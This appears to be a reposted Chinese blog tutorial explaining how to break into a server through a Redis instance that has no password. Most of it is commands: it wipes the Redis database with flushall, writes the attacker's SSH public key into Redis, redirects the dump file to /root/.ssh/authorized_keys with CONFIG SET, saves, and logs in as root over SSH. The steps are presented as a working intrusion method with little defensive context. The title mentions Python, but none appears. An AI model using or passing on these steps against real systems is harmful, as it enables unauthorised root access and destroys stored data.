通過redis入侵服務器的原理是：利用了redis默認配置，許多用戶沒有設置訪問的key。然后通過向redis把自己的公鑰寫入到redis，然后利更改redis的數據庫文件配置，把數據寫入到認證文件。形成免密碼登陸。

一，生成本地ssh公鑰

ssh-keygen

二，先連接redis看看

telnet 192.168.15.10 6379

redis-cli -h 192.168.15.10

三， 清一下redis數據庫

redis-cli -h 192.168.15.10 flushall

四， 向redis寫自己的公鑰

cat key.txt |redis-cli -h 192.168.15.10 -x set redis

五， 利用redis寫入到文件中

#連接redis

#redis-cli -h 192.168.15.10

#查看keys

192.168.15.10>keys *

#寫入配置庫的路徑及存放位置

192.168.15.10>CONFIG SET dir /root/.ssh/

#寫入配置庫名稱及存放的名字

192.168.15.10>CONFIG SET dbfilename "authorized_keys"

#寫入

192.168.15.10>save

#退出

192.168.15.10>exit

六， 遠程連接

ssh root@192.168.15.10

注意，這個是使用的默認的。也就是說別人是用的root來啟動的redis 并且沒有更改sshd配置文件的位置，以及redis可以默認的可以隨意訪問性的。當然有許多可以猜。

這個是最近redis爆出來的。

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

與50位技術專家面對面20年技術見證，附贈技術全景圖

總結

以上是生活随笔為你收集整理的python如何入侵服务器的_通过redis入侵服务器的步骤的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。